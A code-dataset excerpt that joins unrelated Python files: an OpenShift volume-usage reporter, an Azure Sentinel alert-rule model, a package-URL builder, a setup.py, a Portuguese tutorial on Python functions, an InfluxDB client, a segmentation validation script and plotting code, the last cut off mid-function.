def get_pv_usage_clusterresourcequota():
"""get all the pv used if the cluster is using the clusterresourcequota"""
pv_info = runOCcmd_yaml(" get clusterresourcequota/persistent-volume ")
return pv_info
def convert_to_bytes(data):
"""convert to bytes"""
storage_units = {
'' : 1,
'Ki': 2**10,
'Mi': 2**20,
'Gi': 2**30,
'Ti': 2**40,
"k" : 10**3,
"m" : 10**6,
"M" : 10**6,
"G" : 10**9,
"T" : 10**12,
}
(number, unit) = re.search("([0-9]+)([A-Za-z]*)", data.strip()).groups()
if unit in storage_units:
return int(number) * storage_units[unit]
raise Exception("invalid input data: " + data)
def convert_to_kb(data):
"""convert to kib"""
return float(convert_to_bytes(data)) / 1024
def convert_to_mb(data):
"""convert to mb"""
return float(convert_to_kb(data)) / 1024
def convert_to_gb(data):
"""convert to gb"""
return float(convert_to_mb(data)) / 1024
def main():
""" report pv usage """
logger.info('################################################################################')
logger.info(' Starting Report pv usage - %s', datetime.datetime.now().strftime("%Y-%m-%d %H:%M"))
logger.info('################################################################################')
logger.debug("main()")
args = parse_args()
if args.verbose:
logger.setLevel(logging.DEBUG)
ocutil.namespace = "openshift-infra"
dynamic_pod_name = get_dynamic_pod_name()
if dynamic_pod_name == "":
pv_info = get_pv_usage_clusterresourcequota()
#this may be becuase in new version ,will use the clusterresourcequota
cluster_capacity_max = pv_info['status']['total']['hard']['requests.storage']
logger.debug("cluster_capacity_max: %s", cluster_capacity_max)
pv_used = pv_info['status']['total']['used']['requests.storage']
usage_pv = (convert_to_bytes(pv_used)*100)/convert_to_bytes(cluster_capacity_max)
logger.debug("percent of usage of pv: %s", usage_pv)
logger.debug("datasend to zabbix:")
logger.debug("datasend to zabbix: max_gb %s", convert_to_gb(cluster_capacity_max))
logger.debug("datasend to zabbix:pv used: %s", convert_to_gb(pv_used))
send_metrics(usage_pv, convert_to_gb(cluster_capacity_max), convert_to_gb(pv_used))
else:
cluster_capacity_max = get_max_capacity(dynamic_pod_name)
logger.debug("cluster_capacity_max: %s", cluster_capacity_max)
pv_used = get_pv_usage()
logger.debug("cluster_pv_used: %s", pv_used)
cluster_capacity_max_gb = convert_to_gb(cluster_capacity_max)
#use int to send the usge of %
usage_pv = (pv_used*100)/cluster_capacity_max_gb
logger.debug("percent of usage of pv: %s", usage_pv)
send_metrics(usage_pv, cluster_capacity_max_gb, pv_used)
if __name__ == "__main__":
main()
| 2.109375 | 2 |
src/sentinel/azext_sentinel/vendored_sdks/security_insights/models/scheduled_alert_rule.py | hpsan/azure-cli-extensions | 0 | 12765016 | # coding=utf-8
# --------------------------------------------------------------------------
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from .alert_rule import AlertRule
class ScheduledAlertRule(AlertRule):
"""Represents scheduled alert rule.
Variables are only populated by the server, and will be ignored when
sending a request.
All required parameters must be populated in order to send to Azure.
:ivar id: Azure resource Id
:vartype id: str
:ivar name: Azure resource name
:vartype name: str
:ivar type: Azure resource type
:vartype type: str
:param etag: Etag of the azure resource
:type etag: str
:param kind: Required. Constant filled by server.
:type kind: str
:param query: The query that creates alerts for this rule.
:type query: str
:param query_frequency: The frequency (in ISO 8601 duration format) for
this alert rule to run.
:type query_frequency: timedelta
:param query_period: The period (in ISO 8601 duration format) that this
alert rule looks at.
:type query_period: timedelta
:param severity: The severity for alerts created by this alert rule.
Possible values include: 'High', 'Medium', 'Low', 'Informational'
:type severity: str or ~securityinsights.models.AlertSeverity
:param trigger_operator: The operation against the threshold that triggers
alert rule. Possible values include: 'GreaterThan', 'LessThan', 'Equal',
'NotEqual'
:type trigger_operator: str or ~securityinsights.models.TriggerOperator
:param trigger_threshold: The threshold triggers this alert rule.
:type trigger_threshold: int
:param event_grouping_settings: The event grouping settings.
:type event_grouping_settings:
~securityinsights.models.EventGroupingSettings
:param alert_rule_template_name: The Name of the alert rule template used
to create this rule.
:type alert_rule_template_name: str
:param description: The description of the alert rule.
:type description: str
:param display_name: Required. The display name for alerts created by this
alert rule.
:type display_name: str
:param enabled: Required. Determines whether this alert rule is enabled or
disabled.
:type enabled: bool
:ivar last_modified_utc: The last time that this alert rule has been
modified.
:vartype last_modified_utc: datetime
:param suppression_duration: Required. The suppression (in ISO 8601
duration format) to wait since last time this alert rule been triggered.
:type suppression_duration: timedelta
:param suppression_enabled: Required. Determines whether the suppression
for this alert rule is enabled or disabled.
:type suppression_enabled: bool
:param tactics: The tactics of the alert rule
:type tactics: list[str or ~securityinsights.models.AttackTactic]
:param incident_configuration: The settings of the incidents that created
from alerts triggered by this analytics rule
:type incident_configuration:
~securityinsights.models.IncidentConfiguration
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'kind': {'required': True},
'display_name': {'required': True},
'enabled': {'required': True},
'last_modified_utc': {'readonly': True},
'suppression_duration': {'required': True},
'suppression_enabled': {'required': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'etag': {'key': 'etag', 'type': 'str'},
'kind': {'key': 'kind', 'type': 'str'},
'query': {'key': 'properties.query', 'type': 'str'},
'query_frequency': {'key': 'properties.queryFrequency', 'type': 'duration'},
'query_period': {'key': 'properties.queryPeriod', 'type': 'duration'},
'severity': {'key': 'properties.severity', 'type': 'str'},
'trigger_operator': {'key': 'properties.triggerOperator', 'type': 'TriggerOperator'},
'trigger_threshold': {'key': 'properties.triggerThreshold', 'type': 'int'},
'event_grouping_settings': {'key': 'properties.eventGroupingSettings', 'type': 'EventGroupingSettings'},
'alert_rule_template_name': {'key': 'properties.alertRuleTemplateName', 'type': 'str'},
'description': {'key': 'properties.description', 'type': 'str'},
'display_name': {'key': 'properties.displayName', 'type': 'str'},
'enabled': {'key': 'properties.enabled', 'type': 'bool'},
'last_modified_utc': {'key': 'properties.lastModifiedUtc', 'type': 'iso-8601'},
'suppression_duration': {'key': 'properties.suppressionDuration', 'type': 'duration'},
'suppression_enabled': {'key': 'properties.suppressionEnabled', 'type': 'bool'},
'tactics': {'key': 'properties.tactics', 'type': '[str]'},
'incident_configuration': {'key': 'properties.incidentConfiguration', 'type': 'IncidentConfiguration'},
}
def __init__(self, **kwargs):
super(ScheduledAlertRule, self).__init__(**kwargs)
self.query = kwargs.get('query', None)
self.query_frequency = kwargs.get('query_frequency', None)
self.query_period = kwargs.get('query_period', None)
self.severity = kwargs.get('severity', None)
self.trigger_operator = kwargs.get('trigger_operator', None)
self.trigger_threshold = kwargs.get('trigger_threshold', None)
self.event_grouping_settings = kwargs.get('event_grouping_settings', None)
self.alert_rule_template_name = kwargs.get('alert_rule_template_name', None)
self.description = kwargs.get('description', None)
self.display_name = kwargs.get('display_name', None)
self.enabled = kwargs.get('enabled', None)
self.last_modified_utc = None
self.suppression_duration = kwargs.get('suppression_duration', None)
self.suppression_enabled = kwargs.get('suppression_enabled', None)
self.tactics = kwargs.get('tactics', None)
self.incident_configuration = kwargs.get('incident_configuration', None)
self.kind = 'Scheduled'
| 1.820313 | 2 |
src/packageurl/contrib/purl2url.py | canvasslabs/packageurl-python | 0 | 12765017 | # -*- coding: utf-8 -*-
#
# Copyright (c) the purl authors
# SPDX-License-Identifier: MIT
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# Visit https://github.com/package-url/packageurl-python for support and
# download.
from __future__ import absolute_import
from __future__ import print_function
from __future__ import unicode_literals
from packageurl import PackageURL
from packageurl.contrib.route import Router
from packageurl.contrib.route import NoRouteAvailable
import requests
router = Router()
def purl2url(purl):
"""
Return a URL inferred from the `purl` string
"""
if purl:
try:
return router.process(purl)
except NoRouteAvailable:
return
get_url = purl2url
@router.route("pkg:cargo/.*")
def build_cargo_download_url(purl):
"""
Return a cargo download URL `url` from a the `purl` string
"""
purl_data = PackageURL.from_string(purl)
name = purl_data.name
version = purl_data.version
if not (name and version):
return
return "https://crates.io/api/v1/crates/{name}/{version}/download".format(
name=name, version=version
)
@router.route("pkg:bitbucket/.*")
def build_bitbucket_homepage_url(purl):
"""
Return a bitbucket homepage URL `url` from a the `purl` string
"""
purl_data = PackageURL.from_string(purl)
namespace = purl_data.namespace
name = purl_data.name
version = purl_data.version
subpath = purl_data.subpath
if not (name and namespace):
return
url = "https://bitbucket.org/{namespace}/{name}".format(
namespace=namespace, name=name
)
if version:
url = "{url}/src/{version}".format(url=url, version=version)
if subpath:
url = "{url}/{subpath}".format(url=url, subpath=subpath)
return url
@router.route("pkg:github/.*")
def build_github_homepage_url(purl):
"""
Return a github homepage URL `url` from a the `purl` string
"""
purl_data = PackageURL.from_string(purl)
namespace = purl_data.namespace
name = purl_data.name
version = purl_data.version
subpath = purl_data.subpath
if not (name and namespace):
return
url = "https://github.com/{namespace}/{name}".format(namespace=namespace, name=name)
if version:
url = "{url}/tree/{version}".format(url=url, version=version)
if subpath:
url = "{url}/{subpath}".format(url=url, subpath=subpath)
return url
@router.route("pkg:gitlab/.*")
def build_gitlab_homepage_url(purl):
"""
Return a gitlab homepage URL `url` from a the `purl` string
"""
purl_data = PackageURL.from_string(purl)
namespace = purl_data.namespace
name = purl_data.name
version = purl_data.version
subpath = purl_data.subpath
if not (name and namespace):
return
url = "https://gitlab.com/{namespace}/{name}".format(namespace=namespace, name=name)
if version:
url = "{url}/-/tree/{version}".format(url=url, version=version)
if subpath:
url = "{url}/{subpath}".format(url=url, subpath=subpath)
return url
@router.route("pkg:rubygems/.*")
def build_gem_download_url(purl):
"""
Return a rubygems homepage URL `url` from a the `purl` string
"""
purl_data = PackageURL.from_string(purl)
name = purl_data.name
version = purl_data.version
if not (name and version):
return
return "https://rubygems.org/downloads/{name}-{version}.gem".format(
name=name, version=version
)
@router.route("pkg:maven/.*")
def build_maven_download_url(purl):
"""
Return a maven homepage URL `url` from a the `purl` string
"""
purl_data = PackageURL.from_string(purl)
name = purl_data.name
version = purl_data.version
#distribution = '' # for binary jar
distribution = '-sources' # for source
if not (name and version):
return
return "https://repo.maven.apache.org/maven2/{name}/{name}/{version}/{name}-{version}{distribution}.jar".format(name=name, version=version, distribution=distribution)
@router.route("pkg:npm/.*")
def build_npm_download_url(purl):
"""
Return an npm homepage URL `url` from a the `purl` string
"""
purl_data = PackageURL.from_string(purl)
namespace = purl_data.namespace
name = purl_data.name
version = purl_data.version
# javascript appears to be source-only.
# Across all of the npmjs URLs we've observed, all have '/-/' before the name-version.tgz.
# They all end in tgz. (No zip files, etc.)
# If namespace '@something' is present, it is placed before 'name'.
# Otherwise the namespace level is collapsed.
if namespace:
return "https://registry.npmjs.org/{namespace}/{name}/-/{name}-{version}.tgz".format(namespace=namespace, name=name, version=version)
else:
return "https://registry.npmjs.org/{name}/-/{name}-{version}.tgz".format(name=name, version=version)
@router.route("pkg:pypi/.*")
def build_pypi_download_url(purl):
"""
Return an npm homepage URL `url` from a the `purl` string
"""
purl_data = PackageURL.from_string(purl)
namespace = purl_data.namespace
name = purl_data.name
version = purl_data.version
subpath = purl_data.subpath
#distribution = 'bdist' # for binary (wheel, etc.)
distribution = 'sdist' # for source
# TODO: Caching these results would allow multiple versions to be
# handled from the same query.
results = requests.get("https://pypi.org/pypi/{name}/json".format(name=name))
try:
if results.status_code == 200:
for item in results.json()['releases'][version]:
# packagetype can be 'sdist', 'bdist-whl', etc.
if distribution in item['packagetype']:
# if distribution is never found, fall through and return None.
return item['url']
except KeyError:
# assume that an IndexError is caused by a bad reply and return None.
pass
except KeyError:
# assume that a KeyError is caused by an incorrect version string, or
# a bad reply. Return None in either case.
pass
# return None unless complete success.
return None
| 1.875 | 2 |
submissions/joi2014yo/a.py | m-star18/atcoder | 1 | 12765018 | <filename>submissions/joi2014yo/a.py
import sys
read = sys.stdin.buffer.read
readline = sys.stdin.buffer.readline
readlines = sys.stdin.buffer.readlines
sys.setrecursionlimit(10 ** 7)
cnt = 0
for i in range(5):
cnt += max(40, int(readline()))
print(cnt // 5)
| 2.578125 | 3 |
setup.py | bobrik/py-cpuinfo | 0 | 12765019 | <reponame>bobrik/py-cpuinfo
# Copyright (c) 2014-2021 <NAME> <<EMAIL>>
# Py-cpuinfo gets CPU info with pure Python 2 & 3
# It uses the MIT License
# It is hosted at: https://github.com/workhorsy/py-cpuinfo
import os
from setuptools import setup
with open(os.path.join(os.getcwd(), 'README.rst'), 'r') as f:
readme_content = f.read()
setup(
name = "py-cpuinfo",
version = "7.0.0",
author = "<NAME>",
author_email = "<EMAIL>",
description = "Get CPU info with pure Python 2 & 3",
long_description=readme_content,
license = "MIT",
url = "https://github.com/workhorsy/py-cpuinfo",
packages=['cpuinfo'],
test_suite="test_suite",
entry_points = {
'console_scripts': ['cpuinfo = cpuinfo:main'],
},
classifiers=[
"Development Status :: 5 - Production/Stable",
"Topic :: Utilities",
"License :: OSI Approved :: MIT License",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3"
],
)
| 1.710938 | 2 |
Secao8_FuncoesPython/DefinindoFuncoes.py | PauloFTeixeira/curso_python | 0 | 12765020 | """
- Sção pequenas partes de código que realizam tarefas específicas
- Pode ou nõa receber entrada de dados e retornar uma saída de dados
- Muito úteis para para executar procedimentos similares por repetidas vezes
OBS.: Se a função realiza várias tarefas dentro dela, é bom fazer uma verificação para que a função seja simplificada
Exemplos.: print('Olá mundo')
# função
lista = []
lista.append(1)
# função
Funções integradas do Python são chamadas de Built-in, Ex.: print(), lem)(), append() e outras...
Conceito DRY -> Don't repeat yourself (não repita voçe mesmo / não repita seu código)
DEFINIÇÃO DE FUNÇÕES:
def nome_da_função(parâmetro_de_entrada)
bloco da função
ONDE:
Nome da função: sempre minúsculo, se for composto separar com underline (_)
Parâmetro de entrada: Opcional, se for mais de um separar com vírgula (,), podendo ser opcional ou não
Bloco da função: Onde o processamento acontece, pode ter ou não retorno da função. Identado com 4 espaços
Abre-se a função com a palavra reservada "def"
def diz_oi():
print('Oi!')
diz_oi()
---------------------------------------------------------------------------------------------------------------------
# FUNÇÕES COM RETORNO
# Exemplo de função com retorno
lista = [1, 2, 3]
lista.pop()
ret_pop = lista.pop()
print(f'O retorno de pop é: {ret_pop}')
# Exemplo de função sem retorno
lista = [1, 2, 3]
ret_print = print(lista)
print(f'O retorno do print é: {ret_print}') # Retorno é none
# OBS.: Em python, quando a funçao não tem retorno, o valor é none
# OBS.: Funções python que retornam valores, devem retornar esses valores com a palavras reservada "return"
---------------------------------------------------------------------------------------------------------------------
# Exemplo - Sem retorno
def quadrado_de_7():
print(7 * 7)
ret = quadrado_de_7
print(ret)
---------------------------------------------------------------------------------------------------------------------
# Exemplo - Com retorno
def quadrado_de_sete():
return 7 * 7
quadrado_de_7()
print(quadrado_de_sete())
OBS.: Não é obriatório criar variável para receber o retorno, pode-se passar a execução da função para outra
função
---------------------------------------------------------------------------------------------------------------------
# Return é bom para se juntar o retorno com outras partes do código
alguem = '<NAME>'
def oi():
return 'Oi '
print(oi() + alguem)
---------------------------------------------------------------------------------------------------------------------
# Observações sobre a palavras "return"
1 - Ela finaliza a função
2 - Pode-se ter vários return em uma função
3 - Pode-se, em uma função, retornar qualquer tipo de dado e até mesmo multiplicar valores
# Exemplo 1 - return finaliza a função
def oi():
return 'Oi'
print('Olá') # não vai exexutar, porque finalizou no return
print(oi())
---------------------------------------------------------------------------------------------------------------------
# Exemplo 2 - vários return
def nova():
variavel = False
if variavel:
return 4
elif variavel is None:
return 3.2
return 'B'
print(nova())
---------------------------------------------------------------------------------------------------------------------
# Exemplo 3 - retornar qualquer tipo de dado
def outra():
return 2, 3, 4, 5
num1, num2, num3, num4 = outra()
print(num1, num2, num3, num4)
---------------------------------------------------------------------------------------------------------------------
# Função jogar CARA OU COROA
from random import random
def jogar_moeda():
valor = random()
if valor > 0.5:
return 'Cara'
return 'Coroa'
print(jogar_moeda())
---------------------------------------------------------------------------------------------------------------------
"""
| 4.4375 | 4 |
jocasta/connectors/influx.py | chrishannam/zeep | 0 | 12765021 | import json
from influxdb import InfluxDBClient
import logging
import platform
from typing import Dict, List
logging.basicConfig(
level=logging.ERROR,
format='%(asctime)s.%(msecs)03d %(levelname)s: %(message)s',
datefmt='%Y-%m-%d %H:%M:%S',
)
logger = logging.getLogger(__name__)
class InfluxDBConnector(object):
def __init__(self, database, password, username, host=None, port=None):
if not host:
host = 'localhost'
if not port:
port = 8086
self.influx_client = InfluxDBClient(host, port, username, password, database)
def send(self, data: Dict, hostname: str = None) -> None:
"""
Send the data over to the Influx server.
"""
json_payload = _build_payload(data, hostname=hostname)
logger.info('Sending payload to InfluxDB server')
logger.info(json.dumps(json_payload, indent=2))
self.influx_client.write_points(json_payload)
logger.info('Payload sent')
def _build_payload(data: Dict, hostname: str = None) -> List:
"""
Break out each reading into measurements that Influx will understand.
"""
logger.info('Building payload for Influxdb')
payload_values = []
# location isn't a measurement we want to log.
location = data.pop('location', 'unset location')
if not hostname:
hostname = platform.node()
for name, value in data.items():
payload = {
'measurement': name,
'tags': {'host': hostname, 'location': location},
'fields': {'value': float(value)},
}
payload_values.append(payload)
return payload_values
| 2.875 | 3 |
validate.py | hkchengrex/pytorch-semseg | 1 | 12765022 | <reponame>hkchengrex/pytorch-semseg
import yaml
import torch
import argparse
import timeit
import numpy as np
from PIL import Image
from torch.utils import data
from ptsemseg.models import get_model
from ptsemseg.loader import get_loader
from ptsemseg.metrics import runningScore
from ptsemseg.utils import convert_state_dict
torch.backends.cudnn.benchmark = True
def im_inv_trans(im):
# im = im*255
im[0, :, :] += 104.00699
im[1, :, :] += 116.66877
im[2, :, :] += 122.67892
im = im[::-1, :, :]
return im.transpose(1, 2, 0)
def color_map(N=256, normalized=False):
def bitget(byteval, idx):
return ((byteval & (1 << idx)) != 0)
dtype = 'float32' if normalized else 'uint8'
cmap = np.zeros((N, 3), dtype=dtype)
for i in range(N):
r = g = b = 0
c = i
for j in range(8):
r = r | (bitget(c, 0) << 7-j)
g = g | (bitget(c, 1) << 7-j)
b = b | (bitget(c, 2) << 7-j)
c = c >> 3
cmap[i] = np.array([r, g, b])
cmap = cmap/255 if normalized else cmap
return cmap
def validate(cfg, args):
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
# Setup Dataloader
data_loader = get_loader(cfg["data"]["dataset"])
data_path = cfg["data"]["path"]
loader = data_loader(
data_path,
split=cfg["data"]["val_split"],
is_transform=True,
img_size=(cfg["data"]["img_rows"], cfg["data"]["img_cols"]),
)
n_classes = loader.n_classes
valloader = data.DataLoader(loader, batch_size=cfg["training"]["batch_size"], num_workers=8)
running_metrics = runningScore(n_classes)
# Setup Model
model = get_model(cfg["model"], n_classes).to(device)
state = convert_state_dict(torch.load(args.model_path)["model_state"])
model.load_state_dict(state)
model.eval()
model.to(device)
for i, (images, labels) in enumerate(valloader):
start_time = timeit.default_timer()
images = images.to(device)
if args.eval_flip:
outputs = model(images)
# Flip images in numpy (not support in tensor)
outputs = outputs.data.cpu().numpy()
flipped_images = np.copy(images.data.cpu().numpy()[:, :, :, ::-1])
flipped_images = torch.from_numpy(flipped_images).float().to(device)
outputs_flipped = model(flipped_images)
outputs_flipped = outputs_flipped.data.cpu().numpy()
outputs = (outputs + outputs_flipped[:, :, :, ::-1]) / 2.0
pred = np.argmax(outputs, axis=1)
else:
outputs = model(images)
pred = outputs.data.max(1)[1].cpu().numpy()
pred = pred + 1
gt = labels.numpy()
# gt_im = Image.fromarray(gt[0, :, :].astype('uint8'), mode='P')
# gt_im.putpalette(color_map())
# gt_im.save('output/%d_gt.png' % i)
# pred_im = Image.fromarray(pred[0, :, :].astype('uint8'), mode='P')
# pred_im.putpalette(color_map())
# pred_im.save('output/%d_pred.png' % i)
# # print(images.min(), images.max(), images.mean())
# rgb_im = images[0, :, :, :].detach().cpu().numpy()
# rgb_im = im_inv_trans(rgb_im)
# rgb_im = Image.fromarray(rgb_im.astype('uint8'))
# rgb_im.save('output/%d_im.png' % i)
if args.measure_time:
elapsed_time = timeit.default_timer() - start_time
print(
"Inference time \
(iter {0:5d}): {1:3.5f} fps".format(
i + 1, pred.shape[0] / elapsed_time
)
)
running_metrics.update(gt, pred)
score, class_iou = running_metrics.get_scores()
for k, v in score.items():
print(k, v)
for i in range(n_classes-1):
print(i, class_iou[i])
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Hyperparams")
parser.add_argument(
"--config",
nargs="?",
type=str,
default="configs/fcn8s_pascal.yml",
help="Config file to be used",
)
parser.add_argument(
"--model_path",
nargs="?",
type=str,
default="fcn8s_pascal_1_26.pkl",
help="Path to the saved model",
)
parser.add_argument(
"--eval_flip",
dest="eval_flip",
action="store_true",
help="Enable evaluation with flipped image |\
True by default",
)
parser.add_argument(
"--no-eval_flip",
dest="eval_flip",
action="store_false",
help="Disable evaluation with flipped image |\
True by default",
)
parser.set_defaults(eval_flip=True)
parser.add_argument(
"--measure_time",
dest="measure_time",
action="store_true",
help="Enable evaluation with time (fps) measurement |\
True by default",
)
parser.add_argument(
"--no-measure_time",
dest="measure_time",
action="store_false",
help="Disable evaluation with time (fps) measurement |\
True by default",
)
parser.set_defaults(measure_time=True)
args = parser.parse_args()
with open(args.config) as fp:
cfg = yaml.load(fp)
validate(cfg, args)
| 2.109375 | 2 |
plots/for_paper/nice_plots.py | jacqueschen1/adam_sgd_heavy_tails | 1 | 12765023 | <reponame>jacqueschen1/adam_sgd_heavy_tails
"""
Used to generate the plots for the increasing batch size experiments
"""
import pandas
import numpy as np
import matplotlib.pyplot as plt
import math
import data_helpers as h
import fplt
import data_selection
import plotting_common as plth
from plotting_common import (
BEST_PLOT,
METRIC_VS_SS,
dataset_sizes,
LABEL_ADAM,
LABEL_SGD,
LABEL_TO_STYLE,
get_value_at_end_of_run_for_ids,
tag_yaxis,
)
# %%
# Plotting constants and magic strings
def gen_best_run_plot(
args,
model,
dataset,
ax,
batch_size=-1,
acc_step=-1,
metric=h.TRAIN_LOSS,
yaxis_labels=False,
legend=False,
iteration_limit=-1,
):
big_batch = True
full_batch = False
(adam_data, sgd_data, adam_nm_data, sgd_m_data,) = data_selection.select_runs(
acc_step, batch_size, big_batch, dataset, full_batch, metric, model
)
iteration_limit, num_iterations_per_epoch = plth.iter_limit_and_per_epoch(
acc_step, batch_size, big_batch, dataset, iteration_limit, model
)
plot_best_run(
ax,
LABEL_SGD,
sgd_data,
metric,
iteration_limit=iteration_limit,
num_iterations_per_epoch=num_iterations_per_epoch,
)
plot_best_run(
ax,
LABEL_ADAM,
adam_data,
metric,
iteration_limit=iteration_limit,
num_iterations_per_epoch=num_iterations_per_epoch,
)
if metric in [h.TRAIN_ACC, h.F_ONE]:
ax.set_ylim([50, 102.5])
else:
ax.set_yscale("log")
if yaxis_labels:
ax.set_ylabel(plth.format_problem_and_metric(dataset, metric, model))
ax.set_title(str(abs(batch_size * acc_step)), pad=2)
if not yaxis_labels:
ax.tick_params(labelleft=False, which="both")
if legend:
handles, labels = ax.get_legend_handles_labels()
by_label = dict(zip(labels, handles))
loc = "lower right"
if model == "transformer_xl" or model == "transformer_encoder":
loc = "upper right"
if metric == h.TRAIN_LOSS:
if dataset != "mnist":
loc = "upper right"
else:
loc = "lower right"
legend = ax.legend(
by_label.values(), by_label.keys(), fontsize=6, markerscale=6, loc=loc
)
[line.set_linewidth(1) for line in legend.get_lines()]
plth.save_data(
args,
model,
dataset,
{
"adam": adam_data,
"sgd": sgd_data,
"adam_nm": adam_nm_data,
"sgd_m": sgd_m_data,
},
batch_size,
)
def plot_best_run(
ax,
label,
data,
metric,
hyperparam=h.K_SS,
iteration_limit=-1,
num_iterations_per_epoch=-1,
):
ids = list(data[h.K_ID])
color = LABEL_TO_STYLE[label]["color"]
runs_metric = None
runs_training_loss = {}
for run_id in ids:
run = h.get_run(run_id, data_type=h.TRAIN_LOSS)
if iteration_limit > 0:
run = run[run.index <= iteration_limit]
runs_training_loss[run_id] = run
if metric != h.TRAIN_LOSS:
runs_metric = {}
for run_id in ids:
run = h.get_run(run_id, data_type=metric)
begin = run.loc[run["_step"] == 3]
run = pandas.concat([begin, run.iloc[1:, :] - [0, 1, 0]])
if iteration_limit > 0:
run = run[run.index <= iteration_limit]
runs_metric[run_id] = run
if len(ids) > 0:
hyperparam, run_data, time_steps, _ = gen_best_runs_for_metric(
runs_training_loss,
data,
metric,
actual_metric_data=runs_metric,
hyperparam=hyperparam,
)
max_loss, mean_loss, min_loss = plth.get_data_summary_for_metric(
metric, run_data, time_steps
)
i = 2
time_steps = [time_step - i for time_step in time_steps]
if num_iterations_per_epoch > 0:
for i in range(len(time_steps)):
if time_steps[i] != 1:
time_steps[i] = num_iterations_per_epoch * time_steps[i]
ax.plot(
time_steps,
mean_loss,
linestyle=plth.LABEL_TO_STYLE[label]["linestyle"],
color=color,
label=label + " " + plth.latex_sci_notation(hyperparam),
markersize=1,
)
ax.fill_between(time_steps, min_loss, max_loss, color=color, alpha=0.2)
def gen_best_runs_for_metric(
run_for_ids, summary_data, metric, hyperparam=h.K_SS, actual_metric_data=None
):
step_sizes = list(summary_data[hyperparam].unique())
step_to_use = plth.select_best_stepsize(
hyperparam, run_for_ids, step_sizes, summary_data
)
curr_id = []
for seed in range(5):
df_row = summary_data.loc[
(summary_data[h.SEED] == seed) & (summary_data[hyperparam] == step_to_use)
]
if df_row[h.K_ID].size != 0:
for i in range(df_row[h.K_ID].size):
run_id = df_row[h.K_ID].iloc[i]
if len(run_for_ids[run_id]) > 3:
curr_id.append(run_id)
data_to_use = actual_metric_data if actual_metric_data is not None else run_for_ids
return plth.prepare_best_runs(curr_id, metric, data_to_use, step_to_use)
def gen_step_size_vs_metric_plot(
args,
model,
dataset,
ax,
batch_size=-1,
acc_step=-1,
metric=h.TRAIN_LOSS,
legend=False,
yaxis_labels=False,
iteration_limit=-1,
):
big_batch = True
full_batch = False
(adam_data, sgd_data, adam_nm_data, sgd_m_data,) = data_selection.select_runs(
acc_step, batch_size, big_batch, dataset, full_batch, metric, model
)
max_ss, min_ss, unique_ss = data_selection.find_step_size_range(
acc_step, batch_size, big_batch, dataset, full_batch, metric, model
)
adam_ids = list(adam_data[h.K_ID])
max_start_loss = None
if not (metric == h.TRAIN_ACC or metric == h.F_ONE or metric == h.EXACT_MATCH):
runs_for_ids_adam = plth.get_runs_for_ids_and_metric(adam_ids, metric)
runs_for_ids_adam_training_loss = plth.get_runs_for_ids_and_metric(
adam_ids, h.TRAIN_LOSS
)
_, _, _, max_start_loss = gen_best_runs_for_metric(
runs_for_ids_adam_training_loss,
adam_data,
metric,
actual_metric_data=runs_for_ids_adam,
)
iteration_limit, _ = plth.iter_limit_and_per_epoch(
acc_step, batch_size, big_batch, dataset, iteration_limit, model
)
if max_start_loss:
ax.axhline(
y=max_start_loss,
color=plth.COLOR_INITIAL_VALUE,
linestyle="-",
label=plth.LABEL_INITIAL_VALUE,
)
else:
max_start_loss = 0
plot_ss_vs_metric(
sgd_data,
ax,
LABEL_SGD,
metric,
unique_ss,
max_start_loss,
iteration_limit=iteration_limit,
)
plot_ss_vs_metric(
adam_data,
ax,
LABEL_ADAM,
metric,
unique_ss,
max_start_loss,
iteration_limit=iteration_limit,
)
ax.set_title(str(abs(batch_size * acc_step)), pad=2)
ax.set_xscale("log")
if metric not in [h.TRAIN_ACC, h.F_ONE]:
ax.set_yscale("log")
if metric == h.TRAIN_LOSS:
tag_yaxis(ax, increment=1)
else:
ax.set_ylim(0, 105)
ax.set_xlim(min_ss, max_ss)
if yaxis_labels:
ax.set_ylabel(plth.format_problem_and_metric(dataset, metric, model))
else:
ax.set_yticklabels([], minor=False)
ax.set_yticklabels([], minor=True)
ax.set_yticks([], minor=True)
# if metric != h.TRAIN_PPL:
# ax.yaxis.set_major_locator(plt.MaxNLocator(5))
if legend:
plth.make_legend(ax)
plth.save_data(
args,
model,
dataset,
{
"adam": adam_data,
"sgd": sgd_data,
"adam_nm": adam_nm_data,
"sgd_m": sgd_m_data,
},
batch_size,
)
def plot_ss_vs_metric(
data, ax, label, metric, unique_ss, max_start_loss, iteration_limit=-1
):
color = LABEL_TO_STYLE[label]["color"]
steps, mean, min_val, max_val, diverged = [], [], [], [], []
bigger_better = (
metric == h.TRAIN_ACC or metric == h.F_ONE or metric == h.EXACT_MATCH
)
for ss in sorted(unique_ss):
non_diverge = data[(data[h.K_SS] == ss)]
if len(non_diverge) != 0:
ids = list(non_diverge[h.K_ID])
vals = get_value_at_end_of_run_for_ids(ids, metric, iteration_limit)
if np.isnan(vals).any():
mean_loss = math.inf
else:
mean_loss = vals.mean()
if (not bigger_better and (mean_loss >= max_start_loss - 0.01)) or (
bigger_better and (mean_loss <= max_start_loss + 0.01)
):
ax.scatter(
ss,
max_start_loss,
facecolors="none",
linewidth=1,
edgecolors=color,
s=2,
)
diverged.append(ss)
else:
max_loss = vals.max()
